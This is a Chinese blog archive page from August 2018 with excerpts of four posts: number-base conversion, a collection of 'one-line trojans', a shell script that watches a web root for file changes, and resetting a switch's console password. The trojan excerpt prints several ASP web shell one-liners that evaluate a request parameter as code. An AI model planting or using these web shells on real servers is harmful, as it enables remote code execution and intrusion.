08 2018 档案
摘要:一 .进制的定义 二进制:0-15 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101 1110 1111 十六进制:(1个十六进制数 == 4个二进制数) 0 1 2 3 4 5 6 7 8 9 A B C D
阅读全文
摘要:各种一句话木马大全 <%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% <%if
阅读全文
摘要:利用shell脚本监控目录内文件改动 #! /bin/bash webroot="/home/www/" cp /dev/null rsync_file if [ ! -f file.md5 ];then find $webroot -type f -exec md5sum {} \; >>file
阅读全文
摘要:一、Console口重置密码 Console口是交换机的原始控制端口,任何对交换机的操作、设置都可以通过console口完成。 如果console口被设置了密码保护,则需要清空密码。 通过 BootROM 清除 Console 口登录密码。步骤如下: 1、 通过Console口连接交换机,并重启交换
阅读全文

浙公网安备 33010602011771号